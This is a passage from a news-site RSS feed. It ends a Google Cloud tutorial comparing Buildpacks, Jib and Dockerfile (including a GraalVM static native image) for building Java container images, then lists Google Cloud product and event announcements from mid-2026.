comparing-docker-methods:buildpacks</code></p><p>Magic! You didn't have to do anything and the Buildpacks knew how to turn that Java application into a Container Image. It even works on Go, NodeJS, Python, and .Net apps out-of-the-box. So what just happened?  Buildpacks inspect your source and try to identify it as something it knows how to build. In the case of our sample application it noticed the <code>pom.xml</code> file and decided it knows how to build Maven-based applications. The <code>--builder</code> flag told it where to get the Buildpacks from. In this case, <code>gcr.io/buildpacks/builder:v1</code> are the Container Image coordinates to <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks">Google Cloud's Buildpacks</a>. Alternatively you could use the Heroku or Paketo Buildpacks. The parameter <code>comparing-docker-methods:buildpacks</code> is the Container Image coordinates for where to store the output. In this case it stores on the local docker daemon. You can now run that Container Image locally with <code>docker</code>:</p><p><code>docker run -it -ePORT=8080 -p8080:8080 comparing-docker-methods:buildpacks</code></p><p>Of course you can also run that Container Image anywhere that runs Docker / OCI Containers like Kubernetes and Cloud Run.</p><p>Buildpacks are nice because in many cases they just work and you don't have to do anything special to turn your source into something runnable. But the resulting Container Images created from Buildpacks can be a bit bulky. Let's use a tool called <a href="https://github.com/wagoodman/dive" target="_blank"><code>dive</code></a> to examine what is in the created container image:</p><p><code>dive comparing-docker-methods:buildpacks</code></p><p></p><p></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_comparison.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Here you can see the Container Image has 11 layers and a total image size of 319MB. With <code>dive</code> you can explore each layer and see what was changed. In this Container Image the first 6 layers are the base operating system. Layer 7 is the JVM and layer 8 is our compiled application. Layering enables great caching so if only layer 8 changes, then layers 1 through 7 do not need to be re-downloaded. One downside of Buildpacks is how (at least for now) all of the dependencies and compiled application code are stored in a single layer. It would be better to have separate layers for the dependencies and the compiled application.</p><p>To recap, Buildpacks are the easy option that "just works" right out-of-the-box. But the Container Images are a bit large and not optimally layered.</p><h3>Container Builder: Jib</h3><p>The open source <a href="https://github.com/GoogleContainerTools/jib" target="_blank">Jib project</a> is a Java library for creating Container Images with Maven and Gradle plugins. To use it on a Maven project (like the one we from above), just add a build plugin to the <code>pom.xml</code> file:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;plugin&gt;\r\n    &lt;groupId&gt;com.google.cloud.tools&lt;/groupId&gt;\r\n    &lt;artifactId&gt;jib-maven-plugin&lt;/artifactId&gt;\r\n    &lt;version&gt;2.6.0&lt;/version&gt;\r\n&lt;/plugin&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d30&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Now a Container Image can be created and stored in the local docker daemon by running:</p><p><code>./mvnw compile jib:dockerBuild -Dimage=comparing-docker-methods:jib</code></p><p>Using <code>dive</code> we will see that the Container Image for this application is now only 127MB thanks to slimmer operating system and JVM layers. Also, on a Spring Boot application we can see how Jib layers the dependencies, resources, and compiled application for better caching:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Spring_Boot_Application.max-1000x1000.png" alt="Spring Boot Application">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>In this example the 18MB layer contains the runtime dependencies and the final layer contains the compiled application. Unlike with Buildpacks the original source code is not included in the Container Image. Jib also has a great feature where you can use it without docker being installed, as long as you store the Container Image on an external Container Registry (like DockerHub or the Google Cloud Container Registry). Jib is a great option with Maven and Gradle builds for Container Images that use the JVM.</p><h3>Container Builder: Dockerfile</h3><p>The traditional way to create Container Images is built into the <code>docker</code> tool and uses a sequence of instructions defined in a file usually named <code>Dockerfile</code>. Here is a <code>Dockerfile</code> you can use with the sample Java application:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM adoptopenjdk/openjdk8 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nFROM adoptopenjdk/openjdk8:jre\r\n\r\nCOPY --from=builder /app/target/*.jar /server.jar\r\n\r\nCMD ["java", "-jar", "/server.jar"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d90&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>In this example, the first four instructions start with the AdoptOpenJDK 8 Container Image and build the source to a Jar file. The final Container Image is created from the AdoptOpenJDK 8 JRE Container Image and includes the created Jar file. You can run <code>docker</code> to create the Container Image using the <code>Dockerfile</code> instructions:</p><p><code>docker build -t comparing-docker-methods:dockerfile </code></p><p>Using <code>dive</code> we can see a pretty slim Container Image at 209MB:<br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Container_image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>With a <code>Dockerfile</code> we have full control over the layering and base images. For example, we could use the <a href="https://github.com/GoogleContainerTools/distroless/tree/master/java" target="_blank">Distroless Java base image</a> to trim down the Container Image even further. This method of creating Container Images provides a lot of flexibility but we do have to write and maintain the instructions.</p><p>With this flexibility we can do some cool stuff. For example, we can use GraalVM to create a "native image" of our application. This is an ahead-of-time compiled binary which can reduce startup time, reduce memory usage, and alleviate the need for a JVM in the Container Image. And we can go even further and create a statically linked native image which includes everything needed to run so that even an operating system is not needed in the Container Image. Here is the Dockerfile to do that:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM oracle/graalvm-ce:20.2.0-java11 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN gu install native-image\r\n\r\n# BEGIN PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n# SEE: https://github.com/oracle/graal/blob/master/substratevm/StaticImages.md\r\nARG RESULT_LIB="/staticlibs"\r\n\r\nRUN mkdir ${RESULT_LIB} &amp;&amp; \\\r\n    curl -L -o musl.tar.gz https://musl.libc.org/releases/musl-1.2.1.tar.gz &amp;&amp; \\\r\n    mkdir musl &amp;&amp; tar -xvzf musl.tar.gz -C musl --strip-components 1 &amp;&amp; cd musl &amp;&amp; \\\r\n    ./configure --disable-shared --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /muscl &amp;&amp; rm -f /musl.tar.gz &amp;&amp; \\\r\n    cp /usr/lib/gcc/x86_64-redhat-linux/4.8.2/libstdc++.a ${RESULT_LIB}/lib/\r\n\r\nENV PATH="$PATH:${RESULT_LIB}/bin"\r\nENV CC="musl-gcc"\r\n\r\nRUN curl -L -o zlib.tar.gz https://zlib.net/zlib-1.2.11.tar.gz &amp;&amp; \\\r\n   mkdir zlib &amp;&amp; tar -xvzf zlib.tar.gz -C zlib --strip-components 1 &amp;&amp; cd zlib &amp;&amp; \\\r\n   ./configure --static --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /zlib &amp;&amp; rm -f /zlib.tar.gz\r\n#END PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nRUN native-image \\\r\n  --static \\\r\n  --libc=musl \\\r\n  --no-fallback \\\r\n  --no-server \\\r\n  --install-exit-handlers \\\r\n  -H:Name=webapp \\\r\n  -cp /app/target/*.jar \\\r\n  com.google.WebApp\r\n\r\nFROM scratch\r\n\r\nCOPY --from=builder /app/webapp /webapp\r\n\r\nENTRYPOINT ["/webapp"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860df0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will see there is a bit of setup needed to support static native images. After that setup the Jar is compiled like before with Maven. Then the <code>native-image</code> tool creates the binary from the Jar. The <code>FROM scratch</code> instruction means the final container image will start with an empty one. The statically linked binary created by <code>native-image</code> is then copied into the empty container.</p><p>Like before you can use <code>docker</code> to build the Container Image:</p><p><code>docker build -t comparing-docker-methods:graalvm .</code></p><p>Using <code>dive</code> we can see the final Container Image is only 11MB!</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_Image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>And it starts up super fast because we don't need the JVM, OS, etc. Of course GraalVM is not always a great option as there are some challenges like dealing with reflection and debugging. You can read more about this in my blog, <a href="https://jamesward.com/2020/05/07/graalvm-native-image-tips-tricks/" target="_blank">GraalVM Native Image Tips &amp; Tricks</a>.</p><p>This example does capture the flexibility of the <code>Dockerfile</code> method and the ability to do anything you need. It is a great escape hatch when you need one.</p><h3>Which Method Should You Choose?</h3><p></p><ul><li>The easiest, polyglot method: Buildpacks</li><li>Great layering for JVM apps: Jib</li><li>The escape hatch for when those methods don't fit: Dockerfile</li></ul><p></p><p>Check out my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a> to explore these methods as well as the mentioned Spring Boot + Jib example.</p></div>
<div class="block-related_article_tout">





<div class="uni-related-article-tout h-c-page">
  <section class="h-c-grid">
    <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks/" data-analytics='{
                       "event": "page interaction",
                       "category": "article lead",
                       "action": "related article - inline",
                       "label": "article: {slug}"
                     }' class="uni-related-article-tout__wrapper h-c-grid__col h-c-grid__col--8 h-c-grid__col-m--6 h-c-grid__col-l--6
        h-c-grid__col--offset-2 h-c-grid__col-m--offset-3 h-c-grid__col-l--offset-3 uni-click-tracker">
      <div class="uni-related-article-tout__inner-wrapper">
        <p class="uni-related-article-tout__eyebrow h-c-eyebrow">Related Article</p>

        <div class="uni-related-article-tout__content-wrapper">
          <div class="uni-related-article-tout__image-wrapper">
            <div class="uni-related-article-tout__image"></div>
          </div>
          <div class="uni-related-article-tout__content">
            <h4 class="uni-related-article-tout__header h-has-bottom-margin">Announcing Google Cloud buildpacks—container images made easy</h4>
            <p class="uni-related-article-tout__body">Google Cloud buildpacks make it much easier and faster to build applications on top of containers.</p>
            <div class="cta module-cta h-c-copy  uni-related-article-tout__cta muted">
              <span class="nowrap">Read Article
                <svg class="icon h-c-icon" role="presentation">
                  <use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="#mi-arrow-forward"></use>
                </svg>
              </span>
            </div>
          </div>
        </div>
      </div>
    </a>
  </section>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What’s new with Google Cloud]]></title>
<description><![CDATA[Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. Tip: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: Google Cloud bl...]]></description>
<link>https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662833/it-security-nachrichten/whats-new-with-google-cloud/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p data-block-key="kgod7">Want to know the latest from Google Cloud? Find it here in one handy location. Check back regularly for our newest updates, announcements, resources, events, learning opportunities, and more. </p><hr><p data-block-key="ru1z9"><b>Tip</b>: Not sure where to find what you’re looking for on the Google Cloud blog? Start here: <a href="https://cloud.google.com/blog/topics/inside-google-cloud/complete-list-google-cloud-blog-links-2021">Google Cloud blog 101: Full list of topics, links, and resources</a>.</p><hr><p data-block-key="b0lnw"></p></div>
<div class="block-aside"><dl>
    <dt>aside_block</dt>
    <dd>&lt;ListValue: []&gt;</dd>
</dl></div>
<div class="block-paragraph_advanced"><h3>Jul 6 - Jul 10</h3>
<ul>
<li><strong>Webinar: Introducing Google Cloud NGFW Enterprise advanced malware protection - powered by Palo Alto Networks<br></strong>Discover the new Cloud NGFW advanced malware sandbox, arriving in preview later this year. Powered by Palo Alto Networks Advanced Wildfire, it leverages data from 70,000+ customers to help defeat advanced malware. Join us on July 16 at 11 AM EDT to learn how to build a resilient, zero-trust cloud infrastructure that protects your apps and data, wherever they reside.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="18" href="https://www.brighttalk.com/webcast/18282/668861?utm_source=GCBlog" rel="noreferrer noopener" target="_blank">Register for the webinar now</a></li>
<li><strong>Safely run AI-generated code in Cloud Run sandboxes<br></strong>Cloud Run sandboxes, now in public preview, are lightweight, isolated execution boundaries that you can spawn near-instantly <strong>within your existing Cloud Run service instances</strong>.<br><br>Whether you need to let an LLM run a dynamically generated Python script to calculate business margins or spin up a headless browser to perform web research, Cloud Run sandboxes give you a secure, isolated sandbox to run these tasks without leaving your serverless environment.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="22" href="https://cloud.google.com/blog/topics/developers-practitioners/google-cloud-run-sandboxes-are-in-public-preview" rel="noreferrer noopener" target="_blank">Read the blog</a><span> to learn more and get started today.</span></li>
<li><strong>Australia API Horizon: Scaling Enterprise Governed AI Agents<br></strong>The transition from AI chatbots to autonomous agents is the most critical integration point for your business. Join Google Cloud at our upcoming events to explore exclusive deep-dive sessions on architecting for the agentic era.<br><br>Discover how to use Apigee as an intelligent AI Gateway to govern, secure, and scale high-performance architectures. You will learn to seamlessly build AI tools from your existing APIs and maintain control over your entire ecosystem.<br><br>Join us in your preferred city:
<ul>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="36" href="https://goo.gle/4voh18S" rel="noreferrer noopener" target="_blank"><strong>Sydney:</strong> July 28, 2026, at Google Sydney, One Darling Island.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="37" href="https://goo.gle/4h2x0FS" rel="noreferrer noopener" target="_blank"><strong>Canberra:</strong> July 29, 2026, at Hotel Realm.</a></li>
<li><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="38" href="https://goo.gle/4yisb1F" rel="noreferrer noopener" target="_blank"><strong>Melbourne:</strong> August 4, 2026, at Google Melbourne.</a></li>
</ul>
</li>
<li><strong>Build highly available, multi-region services on Cloud Run<br></strong>Maintaining uptime for business-critical applications just got a lot easier on Cloud Run. Service health, now Generally Available, automates cross-region failover by leveraging readiness probes for instance-level health checks with a simple, two-click setup. You can configure service health with global external Application Load Balancers for public-facing applications or cross-region internal Application Load Balancers for private networking traffic.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="42" href="https://cloud.google.com/run/docs/configuring/configure-service-health" rel="noreferrer noopener" target="_blank">Learn how to configure service health for Cloud Run.</a></li>
<li><strong>Report: 83% of organizations need infrastructure upgrades for agentic AI<br></strong>The shift from conversational bots to autonomous agents is breaking legacy systems. Our new <em>State of AI Infrastructure</em> report details how engineering leaders are adapting to these massive new workloads. To eliminate inference bottlenecks, control hidden scaling costs, and manage agent sprawl, the industry is rapidly moving toward fluid compute, centralized governance, and unified, co-designed architectures.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="46" href="https://cloud.google.com/blog/products/compute/state-of-ai-infrastructure-report-overview?e=48754805" rel="noreferrer noopener" target="_blank">Explore our key infrastructure insights</a></li>
<li><strong>Stop tinkering, start scaling: the industrialized AI Playbook<br></strong>Did you know that only 5% of custom AI investments actually return measurable business value? The problem isn’t the technology—it’s how organizations are wired to run it.<br><br>In this compelling read, Google Cloud Consulting breaks down the operational blueprint that bridges the stark gap between "cool tech experiments" and real, P&amp;L-impacting enterprise ROI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="50" href="https://www.google.com/url?q=https%3A%2F%2Fmedium.com%2F%40kjouannigot_73547%2Fscaling-trusted-ai-google-cloud-insights-to-capture-enterprise-roi-aa6c9b308adb" rel="noreferrer noopener" target="_blank">Read the full article on Medium</a></li>
<li><strong>AI Agent Clinic: Slashing App Latency by 80%<br></strong>Prototyping an AI agent is easy, but scaling for live traffic presents unique challenges. In the latest AI Agent Clinic, our technical experts partner with a developer to optimize PlaybackIQ, a live football analysis agent. This session demonstrates how to use OpenTelemetry to trace bottlenecks in the Gemini Enterprise Agent Platform and deploy to Cloud Run for high-concurrency scaling, achieving an 80% reduction in response time. Learn production-grade debugging strategies to optimize your own LLM applications.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="54" href="https://www.google.com/search?q=https://youtu.be/G7olcqETSn8" rel="noreferrer noopener" target="_blank">Watch the 60-minute teardown</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 29 - Jul 3</h3>
<ul>
<li><strong>Claude Sonnet 5, Anthropic’s latest model, is now available on Agent Platform</strong>. <br>This addition serves as a drop-in replacement for Sonnet 4.6, giving organizations expanded choice for task completion across enterprise workflows. It features enhanced reasoning, cleaner code generation, and computer use capabilities for desktop and browser workflows.<br><br>By continuing to rapidly bring frontier models to our platform, Google Cloud offers an uncompromised choice of the industry's best technology to build, test, and scale enterprise-grade AI.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/agent-platform/publishers/anthropic/model-garden/claude-sonnet-5?hl=en" rel="noreferrer noopener" target="_blank"><em>Get started today.</em></a></li>
<li>
<p><strong>Automate your AI governance with Apigee and YAML<br></strong><span>Manual API gateway configurations can quickly slow down your AI engineering velocity. Join the Apigee community on Thursday, July 16, to discover an automated, declarative blueprint for model garden management. Learn how a simple, repeatable YAML pattern lets your AI practitioners instantly spin up secure, policy-backed enterprise configurations  without friction. Bring your questions and connect during our live Q&amp;A session. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 16 Community TechTalk</strong></a></p>
</li>
<li>
<p><strong>Build next-generation AI portals for autonomous agents<br></strong><span>Standard developer portals were designed for human developers to subscribe to static APIs. Today, autonomous agents, LLM toolkits, and dynamic runtimes demand a central nervous system for governance. Join our technical deep dive on Thursday, July 23, to explore Apigee's new AI Portals solution. You will see exactly how to deploy full-service, MCP powered hubs to safely manage enterprise self-service for models, tools, and agents. </span></p>
<p><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 23 Community TechTalk</strong></a></p>
</li>
<li><strong>Protect your infrastructure from advanced cyberattacks at the API layer (Presented in Portuguese)<br></strong>In an era of increasingly sophisticated threats, relying solely on traditional firewalls leaves critical data gaps. Join our technical community TechTalk on Thursday, July 30—conducted in Portuguese—to learn how to proactively mitigate risks directly at the gateway layer. This session demonstrates how to configure and govern essential Apigee security policies to build a robust line of defense, ensuring maximum availability and complete integrity for your enterprise microservices. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4y4j44A" rel="noreferrer noopener" target="_blank"><strong>Register for the July 30 Portuguese Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 22 - Jun 26</h3>
<ul>
<li><strong>Accelerate TPU model loading while saving RAM on GKE.<br></strong>Large model cold starts often stall scaling and leave high-value TPUs idle. The open-source <strong>Run:ai Model Streamer</strong> now natively supports TPUs with Google Cloud Storage in<strong> </strong><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://github.com/vllm-project/tpu-inference" rel="noreferrer noopener" target="_blank"><strong>TPU vLLM 0.18.0</strong>.</a> This integration accelerates inference pipelines on GKE by streaming tensors directly into CPU memory, bypassing local disk bottlenecks and the "double-buffering" trap. In benchmarks, loading a 480B parameter model was <strong>over 2x faster</strong> while cutting peak host memory usage by half. <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/accelerate-tpu-model-loading-while-saving-ram-on-gke/374835" rel="noreferrer noopener" target="_blank"><strong>Read the full guide and get started today</strong></a>.</li>
<li><strong>Stop Training Blind: Scaling AI with the New OpenTelemetry-Based TPU AI Telemetry Collector Agent<br></strong>Google Cloud’s new AI Telemetry Collector agent standardizes TPU monitoring using OpenTelemetry. It optimizes enterprise ML workloads by identifying silent failures and providing zero-cost operational metrics without draining host CPU cycles. The agent seamlessly routes telemetry to Google Cloud Monitoring or Prometheus and custom Grafana setups. Pre-installed on Google-optimized Ubuntu images or available via Docker, it tracks memory, network latency, and core utilization to maximize multi-node training efficiency.<br><br>You can read more of this capability by clicking this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://discuss.google.dev/t/stop-training-blind-scaling-ai-with-the-new-opentelemetry-based-tpu-ai-telemetry-collector-agent/375210" rel="noreferrer noopener" target="_blank">link</a>.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 15 - Jun 19</h3>
<ul>
<li><strong>Join us for a deep dive into agentic AI control with AppyThings<br></strong>Your integrations aren’t failing—they are evolving. When users interact with AI agents, they no longer arrive directly at your site, resulting in experiences stripped of your context, expertise, and intended experience. Join us on Thursday, June 25, for a community tech talk in partnership with AppyThings to learn how to solve this new gateway challenge. We will explore how MTN laid an integration foundation with the Model Context Protocol (MCP) to deliver accurate, consistent experiences. Our technical experts will demonstrate how to leverage Apigee as a centralized tools management solution to govern agent access. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/3Sfle0y" rel="noreferrer noopener" target="_blank"><strong>Register for the session</strong></a></li>
<li><strong>Optimize Spot VM Deployments with Capacity Advisor for Spot, Now in Public Preview<br></strong>Google Compute Engine has launched <strong>Capacity Advisor for Spot</strong> to Public Preview, now open to all customers. This tool turns Spot capacity discovery into a data-driven process by providing real-time deployment recommendations to maximize obtainability and minimize preemption risks. Query the <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank"><strong>Capacity Advisor API</strong></a> for obtainability and minimum estimated uptimes, or use the new <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://console.cloud.google.com/compute/capacityAdvisor" rel="noreferrer noopener" target="_blank"><strong>Console UI</strong></a> featuring a global availability map, spot price lookups, and historical preemption rate trends to visually find the most cost-efficient compute capacity.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/compute/docs/instances/view-vm-availability" rel="noreferrer noopener" target="_blank">Get started today</a> to start optimizing your Spot VM deployments!</li>
<li><strong>Build a multi-tenant agentic AI system<br></strong>When scaling generative AI across different business units, your teams need specialized AI agents with unique operational rules and tools. Our new reference architecture helps you build a centralized multi-tenant platform to prevent fragmented silos, eliminate data exposure risks, and maintain unified compliance. Read the guide to <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://docs.cloud.google.com/architecture/multi-tenant-agentic-ai-system" rel="noreferrer noopener" target="_blank">design and deploy a multi-tenant agentic AI system</a> in Google Cloud.</li>
<li><strong>How to Configure Gemini Enterprise to Connect to a Custom MCP Server<br></strong>The Gemini Enterprise MCP Connector was a big announcement at Google Cloud Next because it introduces the ability to connect Gemini Enterprise to MCP servers. This blog <a href="https://medium.com/google-cloud/how-to-configure-gemini-enterprise-to-connect-to-a-custom-mcp-server-2e28adc96420" rel="noopener" target="_blank">post</a> provides a step-by-step guide on how to configure your first Custom MCP Server connector using the Google Maps Ground Lite MCP server as an example. Once you understand this flow, you can configure multiple MCP servers with Gemini Enterprise to bring all the context you need.</li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 8 - Jun 12</h3>
<ul>
<li><strong>Simplify Multi-Cloud Planning with Cloud Location Finder, now Generally Available</strong> <br>Cloud Location Finder provides up-to-date data on public regions, zones, and Google Distributed Cloud Connected locations across Google Cloud, AWS, Azure, and OCI. You can now programmatically discover locations based on provider, proximity, territory, and carbon footprint to optimize your global infrastructure strategy for performance, compliance, and sustainability. <br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" data-airgap-id="14" href="https://cloud.google.com/location-finder/docs" rel="noreferrer noopener" target="_blank">Get started for free today</a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>Jun 1 - Jun 5</h3>
<ul>
<li><strong>Modeling the physical world with BigQuery Graph</strong><br>Managing complex supply chains requires more than just spreadsheets; it requires a digital replica of the physical world. In this <a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://cloud.google.com/blog/products/data-analytics/modeling-a-digital-twin-using-bigquery-graph" rel="noreferrer noopener" target="_blank">post</a>, Guru Rangavittal and Candice Chen explore how BigQuery Graph enables organizations to build a digital twin by turning physical assets into an interconnected map of nodes and edges. By moving beyond traditional relational databases, businesses gain real-time clarity into operations—from executing surgical ingredient recalls to analyzing weather-driven logistics risks. Discover how BigQuery Graph transforms reactive firefighting into proactive, precision modeling, allowing you to see critical connections in seconds and future-proof your supply chain.</li>
<li><strong>Apigee for AI: Govern LLMs and MCP Servers (Presented in Spanish)<br></strong>Learn how to securely transition your AI initiatives from experimental prototypes to enterprise-ready deployments. Join Luis Cuellar on June 18 for a technical deep dive (presented in Spanish) exploring Apigee’s latest AI gateway capabilities. Discover how to centralize governance over Model Context Protocol (MCP) servers, protect Large Language Models (LLMs) with robust API gateway security policies, and manage token-based quotas.<br><br><a class="colors-hyperlink-primary underline focus-visible outline-offset-0 rounded" href="https://goo.gle/4dyC2Ie" rel="noreferrer noopener" target="_blank"><strong>Register for the June 18 Spanish Community TechTalk</strong></a></li>
</ul>
<h3 data-draftjs-conductor-fragment='{"blocks":[{"key":"865rk","text":"Week of Dec 16 - Dec 20","type":"header-three","depth":0,"inlineStyleRanges":[],"entityRanges":[],"data":{}}],"entityMap":{}}'>May 25 - May 29</h3>
<ul>
<li>
<p><strong><a href="https://www.anthropic.com/news/claude-opus-4-8" rel="noopener" target="_blank"><span>Anthropic’s Claude Opus 4.8</span></a><span> is now available on </span><a href="https://console.cloud.google.com/vertex-ai/publishers/anthropic/model-garden/claude-opus-4-8"><span>Gemini Enterprise Agent Platform</span></a></strong><span><strong>. </strong></span><span>As we continue to expand our platform's model offerings, this addition gives organizations more options for handling complex, multi-stage enterprise workflows. Claude Opus 4.8 brings strong capabilities in agentic coding, allowing developers to manage extensive refactors and tracking dependencies over extended sessions.</span></p>
</li>
<li><strong>API Horizon Munich July 6, 2026: Orchestrating the Next Era of AI and APIs <br></strong>Master the orchestration of next-gen AI and digital ecosystems. Join Google Cloud experts and DACH tech leaders on July 6 for an exclusive look at the Apigee roadmap, Agent Management, and Model Context Protocol (MCP). Gain real-world insights and connect with the regional integration community.<strong><br><br><a href="https://goo.gle/4dTxQmo" rel="noopener" target="_blank">Register now</a></strong></li>
<li><strong>Securing AI Agents: The Extended Agent Gateway Pattern<br></strong>Learn how to prevent autonomous AI agents from invoking unauthorized APIs. Join Apigee Specialist Joel Gauci on June 4 for a technical deep dive into the Extended Agent Gateway pattern. This session covers enforcing Fine-Grained Authorization (FGA), implementing secure token exchange, and establishing Model Context Protocol (MCP) governance at the API gateway layer to protect enterprise backend services.<br><br><a href="https://goo.gle/4fbAsxg" rel="noopener" target="_blank"><strong>Register for the June 4 Community TechTalk</strong></a></li>
